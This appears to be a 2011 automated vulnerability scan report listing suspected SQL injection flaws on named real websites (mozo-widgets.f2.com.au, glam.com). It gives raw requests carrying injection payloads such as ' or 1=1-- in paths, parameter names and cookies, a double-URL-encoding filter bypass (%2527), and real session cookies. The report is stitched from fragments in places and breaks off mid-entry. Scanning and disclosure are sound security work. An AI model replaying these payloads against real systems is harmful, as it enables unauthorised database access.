<script type="text/javascript"> var logged_in = false; var searchType = ''; //var providerNames; // = []; </script>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 99172217'%20or%201%3d1--%20 and 99172217'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/TA99172217'%20or%201%3d1--%20/FM-NEWS HTTP/1.1
Host: mozo-widgets.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/TA99172217' or 1=1-- /FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/TA99172217'%20or%201%3d2--%20/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Runtime: 0.03963 ETag: "5b4aa92de6e82aba561068d98e1e5f96" Status: 200 OK Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: private, must-revalidate, max-age=0 Date: Mon, 02 May 2011 12:46:27 GMT Connection: close Content-Length: 98246
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 19292364'%20or%201%3d1--%20 and 19292364'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/TA/FM-NEWS19292364'%20or%201%3d1--%20 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/TA/FM-NEWS19292364' or 1=1-- on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/TA/FM-NEWS19292364'%20or%201%3d2--%20 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/** * Returns a <code>Boolean</code> indicating whether or not the user agent represents a smart phone. * * @return True if the user agent represents a smart phone; otherwise false. */ function isSmartPhone() { var userAgent = navigator.userAgent return ((matchesSmartPhoneUserAgentRegularExpressions(userAgent)) && (!matchesTabletUserAgentRegularExpressions(userAgent))); }
/** * Returns a <code>Boolean</code> indicating whether or not the specified user agent represents a smart phone. * If any of the regular expressions are updated then they should be updated in * <code>SmartPhoneHelper.java</code>.
...[SNIP]...
1.19. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://mozo-widgets.f2.com.au
Path:
/widgets/multiwidget3/TA/FM-NEWS
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 31488663%20or%201%3d1--%20 and 31488663%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/TA/FM-NEWS?131488663%20or%201%3d1--%20=1 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/TA/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/TA/FM-NEWS?131488663%20or%201%3d2--%20=1 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Apache Last-Modified: Mon, 02 May 2011 11:50:25 GMT ETag: "17c8024-17eeb-a10ae240" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/html Date: Mon, 02 May 2011 12:45:34 GMT Connection: close Content-Length: 98027
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16009845'%20or%201%3d1--%20 and 16009845'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets16009845'%20or%201%3d1--%20/multiwidget3/WAT/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets16009845' or 1=1-- /multiwidget3/WAT/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets16009845'%20or%201%3d2--%20/multiwidget3/WAT/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Runtime: 0.02570 Status: 404 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Date: Mon, 02 May 2011 12:46:42 GMT Connection: close Content-Length: 36120
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title> <meta name="robots" content="noydir" /> <meta name="robots" content="noodp" /> <link rel="canonical" href="http://mozo.com.au/widgets16009845' or 1=2-- /multiwidget3/WAT/FM-NEWS">
<script type="text/javascript"> var logged_in = false; var searchType = ''; //var providerNames; // = []; </script>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 80339781'%20or%201%3d1--%20 and 80339781'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget380339781'%20or%201%3d1--%20/WAT/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget380339781' or 1=1-- /WAT/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget380339781'%20or%201%3d2--%20/WAT/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Status: 404 Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Date: Mon, 02 May 2011 12:46:59 GMT Connection: close Content-Length: 36120
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="keywords" content="Mozo, money info zone, information, bank reviews"/><meta name="description" content="Find products by provider with Mozo. Read reviews about providers, or write your own review about provider."/><title>Mozo - Compare Credit Cards, Home Loans, Term Deposits and more</title> <meta name="robots" content="noydir" /> <meta name="robots" content="noodp" /> <link rel="canonical" href="http://mozo.com.au/widgets/multiwidget380339781' or 1=2-- /WAT/FM-NEWS">
<script type="text/javascript"> var logged_in = false; var searchType = ''; //var providerNames; // = []; </script>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 12878514'%20or%201%3d1--%20 and 12878514'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/WAT12878514'%20or%201%3d1--%20/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/WAT12878514' or 1=1-- /FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/WAT12878514'%20or%201%3d2--%20/FM-NEWS HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Apache X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 X-Runtime: 0.04091 ETag: "c75d435ba4c28ba01dac0272b2847b01" Status: 200 OK Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: private, must-revalidate, max-age=0 Date: Mon, 02 May 2011 12:47:12 GMT Connection: close Content-Length: 98258
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 67737725'%20or%201%3d1--%20 and 67737725'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/WAT/FM-NEWS67737725'%20or%201%3d1--%20 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/WAT/FM-NEWS67737725' or 1=1-- on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/WAT/FM-NEWS67737725'%20or%201%3d2--%20 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
/** * Returns a <code>Boolean</code> indicating whether or not the user agent represents a smart phone. * * @return True if the user agent represents a smart phone; otherwise false. */ function isSmartPhone() { var userAgent = navigator.userAgent return ((matchesSmartPhoneUserAgentRegularExpressions(userAgent)) && (!matchesTabletUserAgentRegularExpressions(userAgent))); }
/** * Returns a <code>Boolean</code> indicating whether or not the specified user agent represents a smart phone. * If any of the regular expressions are updated then they should be updated in * <code>SmartPhoneHelper.java</code>.
...[SNIP]...
1.24. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://mozo-widgets.f2.com.au
Path:
/widgets/multiwidget3/WAT/FM-NEWS
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 99435588%20or%201%3d1--%20 and 99435588%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /widgets/multiwidget3/WAT/FM-NEWS?199435588%20or%201%3d1--%20=1 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /widgets/multiwidget3/WAT/FM-NEWS on this server.</p> </body></html>
Request 2
GET /widgets/multiwidget3/WAT/FM-NEWS?199435588%20or%201%3d2--%20=1 HTTP/1.1 Host: mozo-widgets.f2.com.au Proxy-Connection: keep-alive Referer: http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html?from=smh_ft User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Apache Last-Modified: Mon, 02 May 2011 11:51:26 GMT ETag: "17c809e-17efa-a4adab80" Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/html Date: Mon, 02 May 2011 12:46:24 GMT Connection: close Content-Length: 98042
The keyword parameter appears to be vulnerable to SQL injection attacks. The payloads 18878509'%20or%201%3d1--%20 and 18878509'%20or%201%3d2--%20 were each submitted in the keyword parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 14576993'%20or%201%3d1--%20 and 14576993'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The datr cookie appears to be vulnerable to SQL injection attacks. The payloads 33325718'%20or%201%3d1--%20 and 33325718'%20or%201%3d2--%20 were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /profile HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3%2527; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 1
HTTP/1.1 502 Bad Gateway Content-Type: text/html Expires: Mon, 02 May 2011 14:33:46 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:33:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107
<html><body><h1>502 Bad Gateway</h1> The server returned an invalid or incomplete response. </body></html>
Request 2
GET /profile HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3%2527%2527; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6 X-Powered-By: PHP/5.1.6 X-Pingback: http://www.glam.com/xmlrpc.php Last-Modified: Mon, 02 May 2011 14:33:53 GMT Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 14:33:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:33:54 GMT Content-Length: 27726 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /register HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)'; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6 X-Powered-By: PHP/5.1.6 X-Pingback: http://www.glam.com/xmlrpc.php Last-Modified: Mon, 02 May 2011 14:16:33 GMT Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 14:16:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:16:33 GMT Content-Length: 27727 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <body class="error404" id="bodyID"> ...[SNIP]...
Request 2
GET /register HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)''; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 2
HTTP/1.1 502 Bad Gateway Content-Type: text/html Expires: Mon, 02 May 2011 14:17:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:17:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107
<html><body><h1>502 Bad Gateway</h1> The server returned an invalid or incomplete response. </body></html>
The qcsegs cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the qcsegs cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
As with the __utmz instance above, the recorded responses are the reverse of the described pattern: the single-quote probe (%2527) returned the normal 404 page and the two-quote probe (%2527%2527) returned a 502 Bad Gateway with no database error text. The 502 is a proxy failure, not a database message, and is not evidence of a quoting error on its own.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /register HTTP/1.1 Host: www.glam.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902%2527; PHPSESSID=kicq7kh4ue7p4p7n2husstv0t5; __utma=234602824.706286063.1303348792.1303348869.1304359345.3; bkpix2=1; __utmc=234602824; __utmb=234602824; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6 X-Powered-By: PHP/5.1.6 X-Pingback: http://www.glam.com/xmlrpc.php Last-Modified: Mon, 02 May 2011 14:20:26 GMT Content-Type: text/html; charset=UTF-8 Expires: Mon, 02 May 2011 14:20:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 02 May 2011 14:20:26 GMT Content-Length: 27727 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <body class="error404" id="bodyID"> ...[SNIP]...
Request 2
